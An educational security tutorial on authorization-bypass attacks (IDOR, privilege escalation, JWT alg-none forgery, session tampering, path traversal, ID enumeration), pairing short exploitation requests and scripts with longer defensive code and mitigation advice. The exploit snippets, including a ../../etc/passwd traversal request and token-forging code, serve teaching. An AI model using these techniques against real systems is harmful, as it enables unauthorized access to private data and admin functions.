
Authorization Bypass Attack Vectors

Authorization bypass vulnerabilities let a caller who is authenticated (or sometimes anonymous) reach data or functionality the application meant to deny them, and they can be exploited through various attack vectors. Understanding these vectors is essential for both offensive security testing and defensive measures.

1. Insecure Direct Object References (IDOR)

Description

IDOR occurs when an application provides direct access to objects based on user-supplied input (an ID, a filename, a key) without checking that the requesting user is allowed to access that particular object, allowing attackers to bypass authorization and access unauthorized data.

Real-World Example

A healthcare application exposed patient records by allowing users to manipulate the patient ID parameter in the URL, leading to unauthorized access to sensitive medical information.

Code Example: Vulnerable IDOR

# Assumed imports for these Flask snippets (the page shows only the handlers);
# require_permission and current_user.can_view are app-defined helpers.
from flask import Flask, abort, jsonify

# Vulnerable code: any authenticated caller can read any patient_id.
# Nothing checks that *this* caller may see *this* patient.
@app.route('/api/patient/<patient_id>')
def get_patient(patient_id):
    patient = db.get_patient(patient_id)
    return jsonify(patient)

# Secure code (alternative handler for the same route): a role/permission
# check on the route is not enough on its own, since every doctor holds
# 'view_patient'; the object-level check is the actual fix.
@app.route('/api/patient/<patient_id>')
@require_permission('view_patient')
def get_patient(patient_id):
    patient = db.get_patient(patient_id)
    if patient is None or not current_user.can_view(patient):
        abort(403)  # same response for "missing" and "not yours": no ID oracle
    return jsonify(patient)

Exploitation Example

# Normal user access
GET /api/patient/12345 HTTP/1.1
Host: healthcare-app.com
Authorization: Bearer user_token

# Attacker changes only the patient ID; the server checks that the token is valid, not that this user may view patient 67890
GET /api/patient/67890 HTTP/1.1
Host: healthcare-app.com
Authorization: Bearer user_token

2. Privilege Escalation

Description

Privilege escalation occurs when an attacker gains access beyond what their identity was granted. It is usually split into horizontal escalation (another user's data at the same privilege level) and vertical escalation (functionality reserved for a higher level); both are covered in the next two sections.

Real-World Example

A cloud service had a privilege escalation vulnerability where users could modify their role from "user" to "admin" by manipulating API requests.

Exploitation Code

import requests

# Normal user request: read the caller's current role
response = requests.get('https://cloud-service.com/api/user/role',
                        headers={'Authorization': 'Bearer user_token'})
print(response.json())  # {"role": "user"}

# Privilege escalation attempt: the endpoint copies client-supplied fields
# into the account record (mass assignment), so 'role' is accepted as well
data = {'role': 'admin'}
response = requests.post('https://cloud-service.com/api/user/role',
                         json=data,
                         headers={'Authorization': 'Bearer user_token'})
print(response.status_code)  # 200 - Success

# Confirm the change took effect rather than trusting the status code alone
response = requests.get('https://cloud-service.com/api/user/role',
                        headers={'Authorization': 'Bearer user_token'})
print(response.json())  # {"role": "admin"} if the endpoint is vulnerable
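The server-side counterpart of the request above is a mass-assignment bug: the update handler copies whatever fields the client sends into the account record. The following is an added example, not code from the original article or from the cloud service it describes; the record layout, the allowlist and the function names (update_profile_vulnerable, update_profile_secure, set_role) are assumptions chosen to show the vulnerable handler beside a hardened one.

```python
# Added example (not from the original article): a profile-update handler that
# merges the whole request body (vulnerable) beside one with a field allowlist,
# plus a separate, admin-gated operation for role changes. Names are illustrative.

# Fields an account owner may change about themselves
SELF_WRITABLE = frozenset({"email", "display_name"})
VALID_ROLES = frozenset({"user", "admin"})


def update_profile_vulnerable(record: dict, body: dict) -> dict:
    """Vulnerable: every key in the client's JSON is copied into the account
    record, so {"role": "admin"} is honoured (mass assignment)."""
    updated = dict(record)
    updated.update(body)
    return updated


def update_profile_secure(record: dict, body: dict) -> dict:
    """Secure: only allowlisted fields are writable by the account owner.
    Unexpected fields are rejected rather than silently dropped, so the
    attempt shows up in logs instead of disappearing."""
    unexpected = set(body) - SELF_WRITABLE
    if unexpected:
        raise ValueError(f"fields not writable by the user: {sorted(unexpected)}")
    updated = dict(record)
    updated.update(body)
    return updated


def set_role(actor_role: str, record: dict, new_role: str) -> dict:
    """Role changes are a separate operation. actor_role is the caller's role
    as stored server-side (session or verified token), never a request field."""
    if actor_role != "admin":
        raise PermissionError("only administrators may change roles")
    if new_role not in VALID_ROLES:
        raise ValueError(f"unknown role {new_role!r}")
    updated = dict(record)
    updated["role"] = new_role
    return updated


if __name__ == "__main__":
    # Constructed sample record
    alice = {"email": "alice@example.com", "display_name": "Alice", "role": "user"}
    print(update_profile_vulnerable(alice, {"role": "admin"})["role"])  # admin
    try:
        update_profile_secure(alice, {"role": "admin"})
    except ValueError as e:
        print("rejected:", e)
```

Rejecting unknown fields instead of stripping them is a deliberate choice: a 400 on `role` in a profile update is a cheap, high-signal detection event, while silent stripping hides the probe.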

3. Horizontal Privilege Escalation

Description

Horizontal privilege escalation occurs when a user gains access to resources of another user with the same privilege level.

Real-World Example

A banking application allowed users to view account details of other users by manipulating the account ID parameter.

Exploitation Example

# User A's account
GET /api/account/12345 HTTP/1.1
Host: bank-app.com
Authorization: Bearer user_a_token

# User B's account (horizontal escalation)
GET /api/account/67890 HTTP/1.1
Host: bank-app.com
Authorization: Bearer user_a_token
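Both the patient-record case in section 1 and the bank-account case above have the same root cause: the handler checks that the caller is logged in and then returns whatever object the ID names. The following is an added example, not code from the original article or from either application it describes; the data model (User, Patient, the PATIENTS table) and the function names are assumptions. It shows the vulnerable lookup beside one that evaluates authorization against the specific object, covering the owner, caseload (doctor) and admin cases.

```python
# Added example (not from the original article): an in-memory patient store
# with a lookup that only checks authentication (vulnerable) beside one that
# checks the caller's relationship to the requested object (object-level
# authorization). Names and data are constructed for the demo.
from dataclasses import dataclass, field


class Forbidden(Exception):
    """Caller is authenticated but not allowed to see this object."""


@dataclass(frozen=True)
class User:
    user_id: int
    role: str                                         # "patient", "doctor" or "admin"
    patients: frozenset = field(default_factory=frozenset)  # a doctor's caseload


@dataclass(frozen=True)
class Patient:
    patient_id: int
    owner_user_id: int                                # the patient's own account
    notes: str


# Constructed sample data
PATIENTS = {
    12345: Patient(12345, owner_user_id=1, notes="asthma"),
    67890: Patient(67890, owner_user_id=2, notes="hypertension"),
}


def get_patient_vulnerable(current_user, patient_id: int) -> Patient:
    """Vulnerable: the only check is that someone is logged in."""
    if current_user is None:
        raise PermissionError("login required")
    return PATIENTS[patient_id]                        # any valid ID is returned


def can_view(current_user: User, patient: Patient) -> bool:
    """Object-level rule: a patient sees their own record, a doctor sees the
    patients on their caseload, an admin sees everything."""
    if current_user.role == "admin":
        return True
    if current_user.role == "doctor":
        return patient.patient_id in current_user.patients
    return patient.owner_user_id == current_user.user_id


def get_patient_secure(current_user, patient_id: int) -> Patient:
    """Secure: authorization is evaluated against the specific object."""
    if current_user is None:
        raise PermissionError("login required")
    patient = PATIENTS.get(patient_id)
    # Same error for "does not exist" and "not yours", so the endpoint cannot
    # be used as an oracle to enumerate which IDs are valid.
    if patient is None or not can_view(current_user, patient):
        raise Forbidden(f"patient {patient_id}")
    return patient


if __name__ == "__main__":
    alice = User(user_id=1, role="patient")
    print(get_patient_vulnerable(alice, 67890).notes)  # leaks another patient's record
    try:
        get_patient_secure(alice, 67890)
    except Forbidden as e:
        print("blocked:", e)
```

Note that switching to random or UUID identifiers does not fix this class of bug; it only makes IDs harder to guess, and IDs still leak through other responses, as section 9 shows.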

4. Vertical Privilege Escalation

Description

Vertical privilege escalation occurs when a user gains access to resources or functionality reserved for higher privilege levels.

Real-World Example

An e-commerce platform allowed regular users to access admin functionality by modifying the user role in session data.

Exploitation Code

import base64, json, requests

# Works only when the role is kept in a client-readable, unsigned session blob
# (the flaw described above); session_cookie is the captured cookie value,
# assumed here to be base64-encoded JSON
session = json.loads(base64.b64decode(session_cookie))
session['role'] = 'admin'
session['is_admin'] = True
forged = base64.b64encode(json.dumps(session).encode()).decode()

# Access admin functionality with the forged session
response = requests.get('https://ecommerce.com/admin/dashboard',
                        cookies={'session': forged})

5. API Authorization Bypass

Description

API endpoints may have inadequate authorization checks, allowing attackers to access sensitive data or perform actions without proper credentials.

Real-World Example

A mobile app API did not properly validate authorization tokens for certain endpoints, allowing unauthorized access to user data.

Exploitation Code

import requests

# Request with no Authorization header at all: the endpoint never checks
response = requests.get('https://api.vulnerable-app.com/admin/users')
print(response.json())  # Returns user list without proper authorization

# Bypass using an empty token: the check tests only that the header is
# present, not that the token is valid
headers = {'Authorization': 'Bearer '}
response = requests.get('https://api.vulnerable-app.com/admin/users', headers=headers)
print(response.status_code)  # 200 if the header's presence is all that is checked

6. JWT Token Manipulation

Description

JSON Web Tokens (JWT) can be manipulated if not properly validated, allowing attackers to bypass authorization by modifying token claims. The payload is only base64url-encoded, so anyone holding a token can read and rewrite it; only the signature check stops the rewritten token from being accepted.

Real-World Example

A financial application used JWT for authorization but did not validate the token signature, allowing attackers to modify the token and gain admin privileges. Accepting tokens whose header declares alg "none" has the same effect, since such tokens carry no signature to check.

Exploitation Code

import jwt  # PyJWT

# Original token (HS256-signed, role "user")
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwidXNlcm5hbWUiOiJqb2huZG9lIiwiaWF0IjoxNTE2MjM5MDIyLCJyb2xlIjoidXNlciJ9.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"

# Decode without verifying the signature; the attacker can always do this,
# because the payload is only base64url-encoded, not encrypted
decoded = jwt.decode(token, options={"verify_signature": False})
decoded['role'] = 'admin'  # Modify role

# Forge a token with the modified claims and alg "none" (no signature).
# Accepted by a server that allows "none" or never verifies signatures at
# all; PyJWT requires an empty or None key for alg "none".
new_token = jwt.encode(decoded, key='', algorithm='none')
print(new_token)
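To see why the forgery above works against one server and fails against another, it helps to look at the verification side. The following is an added example, not code from the original article or from any JWT library; it implements HS256 signing and verification directly on the standard library (no PyJWT dependency), with a constructed secret and constructed claims. It produces both forgeries the text describes (alg "none", and rewritten claims with the original signature kept) and shows a verifier that pins the algorithm server-side, compares the MAC in constant time and enforces exp, so that neither forgery is accepted.

```python
# Added example (not from the original article): minimal HS256 JWT issuing
# and verification on the standard library, the two forgeries an attacker
# tries against a weak verifier, and a verifier that rejects both.
# SECRET and all claims are constructed for the demo.
import base64
import hashlib
import hmac
import json
import time

SECRET = b"constructed-demo-secret-do-not-reuse"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_segment(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Server: issue an HS256-signed token."""
    signing_input = f"{encode_segment({'alg': 'HS256', 'typ': 'JWT'})}.{encode_segment(claims)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def peek_claims(token: str) -> tuple:
    """What a decoder that skips verification sees: (header, claims).
    Anyone can do this; the segments are only base64url-encoded."""
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def forge_none(token: str, **new_claims) -> str:
    """Attacker: rewrite claims, set alg to none, send an empty signature."""
    _, claims = peek_claims(token)
    claims.update(new_claims)
    return f"{encode_segment({'alg': 'none', 'typ': 'JWT'})}.{encode_segment(claims)}."


def forge_keep_signature(token: str, **new_claims) -> str:
    """Attacker: rewrite claims but keep the original signature. Only a
    server that never checks the signature accepts this."""
    header_b64, _, sig_b64 = token.split(".")
    _, claims = peek_claims(token)
    claims.update(new_claims)
    return f"{header_b64}.{encode_segment(claims)}.{sig_b64}"


def verify_hs256(token: str, secret: bytes, now=None) -> dict:
    """Server: the algorithm is pinned here, never taken from the token; the
    MAC is compared in constant time; exp is enforced. Raises ValueError."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"unsupported alg {header.get('alg')!r}")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(payload_b64))
    if "exp" in claims and claims["exp"] <= (time.time() if now is None else now):
        raise ValueError("token expired")
    return claims


if __name__ == "__main__":
    legit = sign_hs256({"sub": "1234567890", "role": "user", "exp": 2_000_000_000}, SECRET)
    for label, t in [("legit", legit),
                     ("alg none", forge_none(legit, role="admin")),
                     ("kept signature", forge_keep_signature(legit, role="admin"))]:
        try:
            print(label, "->", verify_hs256(t, SECRET)["role"])
        except ValueError as e:
            print(label, "-> rejected:", e)
```

The important design point is that the accepted algorithm is a server constant, not `header["alg"]`: reading the algorithm from the token is what makes both the "none" bypass and RS256-to-HS256 key-confusion attacks possible in libraries that allow it.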

7. Session Manipulation

Description

Session manipulation involves modifying session data to gain unauthorized access to resources or functionality.

Real-World Example

A web application stored user roles in client-side sessions, allowing attackers to modify their role to gain admin access.

Exploitation Code

// Modify session storage (only matters if the app's client-side code, or a
// later request body it builds, reads the role from here)
sessionStorage.setItem('role', 'admin');
sessionStorage.setItem('isAdmin', 'true');

// Or modify cookies, which are sent to the server on every request and work
// whenever the server reads the role from the cookie instead of its own store
document.cookie = "role=admin; path=/";
document.cookie = "isAdmin=true; path=/";
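Sections 4 and 7 describe the same flaw from two angles: the server takes its answer to "is this caller an admin?" from state the client controls. The following is an added example, not code from the original article or from either application it describes; the session store, cookie names and function names are assumptions. It contrasts a check that reads role flags from cookies with one that treats the cookie as nothing more than an opaque, randomly generated key into a server-side session store, so the forged `role=admin` and `isAdmin=true` cookies from the exploitation code above are simply ignored.

```python
# Added example (not from the original article): admin check that trusts
# client-supplied role cookies (vulnerable) beside one that keeps the session
# server-side and accepts only an unguessable session ID from the client.
# The store and cookie names are constructed for the demo.
import secrets

# Server-side session store: session_id -> authenticated user data.
# A real deployment would back this with Redis or a database.
SESSION_STORE = {}


def login(username: str, role: str) -> str:
    """Create a server-side session; the client receives only a random ID."""
    sid = secrets.token_urlsafe(32)
    SESSION_STORE[sid] = {"user": username, "role": role}
    return sid


def is_admin_vulnerable(cookies: dict) -> bool:
    """Vulnerable: role and isAdmin are read straight from the request."""
    return cookies.get("role") == "admin" or cookies.get("isAdmin") == "true"


def is_admin_secure(cookies: dict) -> bool:
    """Secure: only the session ID comes from the client; the role is looked
    up server-side. Extra cookies such as role=admin have no effect."""
    session = SESSION_STORE.get(cookies.get("session"))
    return session is not None and session["role"] == "admin"


def admin_dashboard(cookies: dict, is_admin) -> str:
    """Route handler parameterised on the check so both variants can be run."""
    if not is_admin(cookies):
        return "403 Forbidden"
    return "200 admin dashboard"


if __name__ == "__main__":
    sid = login("alice", "user")
    attacker = {"session": sid, "role": "admin", "isAdmin": "true"}
    print(admin_dashboard(attacker, is_admin_vulnerable))  # 200 admin dashboard
    print(admin_dashboard(attacker, is_admin_secure))      # 403 Forbidden
```

The session ID must be generated with a cryptographic source (here `secrets.token_urlsafe`) and issued in a cookie marked Secure, HttpOnly and SameSite; the JavaScript in section 7 cannot read an HttpOnly cookie, and it cannot usefully forge one it cannot guess.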

8. Path Traversal

Description

Path traversal vulnerabilities allow attackers to access files and directories outside the intended directory. It belongs in this list because the file path is itself an object reference: the download handler trusts the client-supplied name and never checks that the resolved file is one the caller is allowed to read.

Real-World Example

A file sharing application allowed users to download files by specifying the file path, but did not properly validate the path, leading to unauthorized file access.

Exploitation Example

# Normal file download
GET /download?file=report.pdf HTTP/1.1
Host: file-share.com

# Path traversal attack
GET /download?file=../../etc/passwd HTTP/1.1
Host: file-share.com
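The fix on the server side is to resolve the requested name against a fixed download directory and refuse anything whose resolved path leaves it. The following is an added example, not code from the original article or from the file-sharing application it describes; the base directory, the function name and the error type are assumptions. It handles the cases a download endpoint has to get right: `..` sequences, percent-encoded traversal, absolute paths, NUL bytes, and the sibling-directory case (`/srv/files_private`) that a naive string-prefix check gets wrong.

```python
# Added example (not from the original article): resolving a user-supplied
# file name inside a fixed download directory. Directory names are
# constructed for the demo; nothing is read from disk.
import os
from urllib.parse import unquote


class PathTraversal(Exception):
    """The requested name resolves outside the download directory."""


def resolve_download(base_dir: str, requested: str) -> str:
    """Return the absolute path that may be served, or raise PathTraversal.

    Percent-decodes once (the web server normally does this, but a
    double-encoded %252e would otherwise survive), rejects NUL bytes and
    absolute paths, joins to the base, resolves '..' and symlinks, then
    checks that the result is still inside base_dir.
    """
    name = unquote(requested)
    if "\x00" in name:
        raise PathTraversal("NUL byte in file name")
    if os.path.isabs(name):
        raise PathTraversal("absolute path not allowed")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    # Containment check via commonpath: a plain target.startswith(base) would
    # wrongly accept "/srv/files_private/x" for base "/srv/files".
    if os.path.commonpath([base, target]) != base:
        raise PathTraversal(f"{requested!r} escapes {base_dir}")
    return target


if __name__ == "__main__":
    for req in ("report.pdf", "../../etc/passwd", "..%2F..%2Fetc%2Fpasswd",
                "/etc/passwd", "../files_private/secret.txt"):
        try:
            print(req, "->", resolve_download("/srv/files", req))
        except PathTraversal as e:
            print(req, "-> rejected:", e)
```

A containment check is necessary but still not an authorization check: once the path is known to be inside the share, the handler must additionally confirm that this user may download that particular file, exactly as in the IDOR sections above.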

9. Insecure Direct Object References in APIs

Description

APIs may expose internal object references that can be manipulated to access unauthorized data.

Real-World Example

A social media API exposed user IDs in responses, allowing attackers to enumerate and access other users' profiles.

Exploitation Code

import requests

# Enumerate user profiles: the endpoint returns any profile to any caller,
# so a sequential ID sweep maps out the whole user base
for user_id in range(1, 1000):
    response = requests.get(f'https://api.social-media.com/users/{user_id}')
    if response.status_code == 200:
        print(f"Found user: {user_id}")

10. Missing Function Level Access Control

Description

Missing function level access control occurs when an application does not properly restrict access to functionality based on user roles: the admin links are hidden from the regular user's UI, but the server still serves the admin pages and API actions to anyone who requests the URL directly.

Real-World Example

A web application had admin functionality accessible to regular users by directly visiting admin URLs.

Exploitation Example

# Regular user accesses admin functionality
GET /admin/dashboard HTTP/1.1
Host: vulnerable-app.com
Cookie: session=regular_user_session

# Or via a direct API call
POST /admin/delete-user HTTP/1.1
Host: vulnerable-app.com
Cookie: session=regular_user_session
Content-Type: application/json

{"user_id": 123}
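The two requests above, and the missing-token requests in section 5, all succeed for the same reason: the handler runs before anyone has asked who the caller is and what they are allowed to do. The following is an added example, not code from the original article or from either application it describes, of a small request dispatcher that makes that ordering impossible to skip: a route cannot be registered without an explicit role requirement, a missing or empty bearer token is answered with 401 before the handler runs, and a valid token with the wrong role gets 403. The token table, routes and handler names are assumptions constructed for the demo.

```python
# Added example (not from the original article): deny-by-default dispatcher
# enforcing authentication and function-level authorization before any
# handler runs. Tokens, identities and routes are constructed for the demo.

# Constructed token -> identity table; a real API would verify a JWT or look
# the token up in a store, but the dispatch logic below is the same
TOKENS = {
    "user_token": {"sub": "alice", "role": "user"},
    "admin_token": {"sub": "root", "role": "admin"},
}

ROUTES = {}  # (method, path) -> (handler, allowed_roles)


def route(method: str, path: str, roles):
    """Every registration must state who may call it; an empty set is refused
    so that no endpoint can exist without an authorization requirement."""
    if not roles:
        raise ValueError(f"{method} {path}: roles must be a non-empty set")

    def register(fn):
        ROUTES[(method, path)] = (fn, frozenset(roles))
        return fn
    return register


def authenticate(headers: dict):
    """Return the identity for a well-formed bearer token, else None.
    'Bearer ' with an empty token is rejected like a missing header."""
    scheme, _, token = headers.get("Authorization", "").partition(" ")
    if scheme != "Bearer" or not token.strip():
        return None
    return TOKENS.get(token.strip())


def dispatch(method: str, path: str, headers: dict, body=None):
    """Return (status, payload). Authentication and authorization are decided
    here, centrally, so a handler cannot forget them."""
    entry = ROUTES.get((method, path))
    if entry is None:
        return 404, "not found"
    handler, allowed = entry
    identity = authenticate(headers)
    if identity is None:
        return 401, "authentication required"
    if identity["role"] not in allowed:
        return 403, "forbidden"                   # logged in, wrong role
    return 200, handler(identity, body)


@route("GET", "/admin/users", roles={"admin"})
def list_users(identity, body):
    return ["alice", "root"]


@route("POST", "/admin/delete-user", roles={"admin"})
def delete_user(identity, body):
    return f"deleted {body['user_id']}"


@route("GET", "/me", roles={"user", "admin"})
def me(identity, body):
    return identity["sub"]


if __name__ == "__main__":
    print(dispatch("GET", "/admin/users", {}))
    print(dispatch("GET", "/admin/users", {"Authorization": "Bearer "}))
    print(dispatch("POST", "/admin/delete-user",
                   {"Authorization": "Bearer user_token"}, {"user_id": 123}))
    print(dispatch("GET", "/admin/users", {"Authorization": "Bearer admin_token"}))
```

Returning 403 rather than 404 for a wrong-role caller is a choice; some teams prefer 404 on admin routes so that regular users cannot confirm the route exists. Either way the decision is made in one place, which is what a reviewer should look for when auditing a code base for this class of bug.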

Defense Strategies

For each attack vector, implement corresponding defensive measures:

  1. Proper Access Control Checks: Verify on every request that the authenticated caller is allowed to perform this action on this specific object; a route-level role check alone does not stop IDOR.
  2. Input Validation: Validate and sanitize all user inputs (paths, IDs, field names) to remove traversal sequences and unexpected fields, but treat it as a complement to, not a substitute for, authorization: a well-formed ID can still belong to another user.
  3. Secure Session Management: Keep identity and role server-side, keyed by an unguessable session ID; send cookies with the Secure, HttpOnly and SameSite attributes, and ignore any role-like values a client presents.
  4. JWT Token Validation: Always verify the signature with a server-pinned algorithm (reject "none" and algorithm switching), and check exp, iss and aud.
  5. API Security: Deny by default: every endpoint, including "internal" and admin ones, carries an explicit authorization requirement, and a missing or empty bearer token yields 401 before any handler runs.
  6. Regular Security Assessments: Conduct penetration tests and code reviews that specifically try cross-user and cross-role access (swap IDs, swap tokens, replay a regular user's session against admin routes).

By understanding these attack vectors, security professionals can better protect applications and systems from authorization bypass vulnerabilities.